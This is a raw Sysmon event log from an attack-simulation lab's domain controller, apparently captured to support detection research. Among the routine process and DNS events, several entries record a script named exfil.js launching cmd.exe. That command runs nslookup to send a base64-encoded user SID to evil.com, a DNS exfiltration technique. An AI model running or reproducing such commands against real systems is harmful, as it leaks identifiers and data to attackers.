14:21:37.297{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.281{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7644-000000005F02}6504C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.281{2E1864BB-18F1-629A-7444-000000005F02}37322200C:\Windows\system32\cmd.exe{2E1864BB-18F1-629A-7644-000000005F02}6504C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.294{2E1864BB-18F1-629A-7644-000000005F02}6504C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F1-629A-7444-000000005F02}3732C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyomwu.tmp 2>&1 10341000x8000000000000000210997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.260{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-7544-000000005F02}5704C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.260{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-7544-000000005F02}5704C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.260{2E1864BB-18F1-629A-7544-000000005F02}57048016C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-7444-000000005F02}3732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.244{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7544-000000005F02}5704C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.229{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.229{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.229{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.229{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.229{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7444-000000005F02}3732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.229{2E1864BB-18E0-629A-6742-000000005F02}39764636C:\Windows\System32\WScript.exe{2E1864BB-18F1-629A-7444-000000005F02}3732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.241{2E1864BB-18F1-629A-7444-000000005F02}3732C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyomwu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.229{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrywy.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000210985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.782{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50864- 354300x8000000000000000210984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.782{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50863- 354300x8000000000000000210983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.781{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50862- 354300x8000000000000000210982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.685{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50861- 354300x8000000000000000210981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.684{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50860- 354300x8000000000000000210980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.684{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50859- 354300x8000000000000000210979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.598{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50858- 354300x8000000000000000210978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.598{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50857- 354300x8000000000000000210977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.598{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50856- 354300x8000000000000000210976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.523{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50855- 354300x8000000000000000210975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.523{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50854- 354300x8000000000000000210974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.522{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50853- 354300x8000000000000000210973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.522{00000000-0000-0000-0000-000000000000}5168<unknown process>-udptruefalse127.0.0.1-50853-false127.0.0.1-53domain 354300x8000000000000000210972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.454{00000000-0000-0000-0000-000000000000}7204<unknown process>-udpfalsefalse127.0.0.1-50852-false127.0.0.1-53domain 354300x8000000000000000210971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.454{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50852- 354300x8000000000000000210970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.454{00000000-0000-0000-0000-000000000000}7204<unknown process>-udptruefalse127.0.0.1-50852-false127.0.0.1-53domain 354300x8000000000000000210969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.392{00000000-0000-0000-0000-000000000000}5136<unknown process>-udpfalsefalse127.0.0.1-50851-false127.0.0.1-53domain 354300x8000000000000000210968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.392{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50851- 354300x8000000000000000210967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.392{00000000-0000-0000-0000-000000000000}5136<unknown process>-udpfalsefalse127.0.0.1-50850-false127.0.0.1-53domain 354300x8000000000000000210966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.392{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50850- 354300x8000000000000000210965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.392{00000000-0000-0000-0000-000000000000}5136<unknown process>-udptruefalse127.0.0.1-50850-false127.0.0.1-53domain 354300x8000000000000000210964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.392{00000000-0000-0000-0000-000000000000}5136<unknown process>-udpfalsefalse127.0.0.1-50849-false127.0.0.1-53domain 354300x8000000000000000210963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.392{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50849- 354300x8000000000000000210962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.392{00000000-0000-0000-0000-000000000000}5136<unknown process>-udptruefalse127.0.0.1-50849-false127.0.0.1-53domain 354300x8000000000000000210961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.314{00000000-0000-0000-0000-000000000000}724<unknown process>-udpfalsefalse127.0.0.1-50848-false127.0.0.1-53domain 354300x8000000000000000210960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.314{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50848- 354300x8000000000000000210959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.314{00000000-0000-0000-0000-000000000000}724<unknown process>-udptruefalse127.0.0.1-50848-false127.0.0.1-53domain 354300x8000000000000000210958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.313{00000000-0000-0000-0000-000000000000}724<unknown process>-udpfalsefalse127.0.0.1-50847-false127.0.0.1-53domain 354300x8000000000000000210957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.313{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50847- 354300x8000000000000000210956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.313{00000000-0000-0000-0000-000000000000}724<unknown process>-udptruefalse127.0.0.1-50847-false127.0.0.1-53domain 354300x8000000000000000210955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.313{00000000-0000-0000-0000-000000000000}724<unknown process>-udpfalsefalse127.0.0.1-50846-false127.0.0.1-53domain 354300x8000000000000000210954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.313{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50846- 354300x8000000000000000210953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.313{00000000-0000-0000-0000-000000000000}724<unknown process>-udptruefalse127.0.0.1-50846-false127.0.0.1-53domain 354300x8000000000000000210952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.226{00000000-0000-0000-0000-000000000000}3916<unknown process>-udpfalsefalse127.0.0.1-50845-false127.0.0.1-53domain 354300x8000000000000000210951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.226{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50845- 354300x8000000000000000210950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.225{00000000-0000-0000-0000-000000000000}3916<unknown process>-udptruefalse127.0.0.1-50845-false127.0.0.1-53domain 354300x8000000000000000210949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.225{00000000-0000-0000-0000-000000000000}3916<unknown process>-udpfalsefalse127.0.0.1-50844-false127.0.0.1-53domain 354300x8000000000000000210948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.225{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50844- 354300x8000000000000000210947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.225{00000000-0000-0000-0000-000000000000}3916<unknown process>-udpfalsefalse127.0.0.1-50843-false127.0.0.1-53domain 354300x8000000000000000210946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.224{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50843- 354300x8000000000000000210945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.224{00000000-0000-0000-0000-000000000000}3916<unknown process>-udptruefalse127.0.0.1-50843-false127.0.0.1-53domain 354300x8000000000000000210944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.108{00000000-0000-0000-0000-000000000000}2792<unknown process>-udpfalsefalse127.0.0.1-50842-false127.0.0.1-53domain 354300x8000000000000000210943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.108{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50842- 354300x8000000000000000210942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.108{00000000-0000-0000-0000-000000000000}2792<unknown process>-udptruefalse127.0.0.1-50842-false127.0.0.1-53domain 354300x8000000000000000210941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.108{00000000-0000-0000-0000-000000000000}2792<unknown process>-udpfalsefalse127.0.0.1-50841-false127.0.0.1-53domain 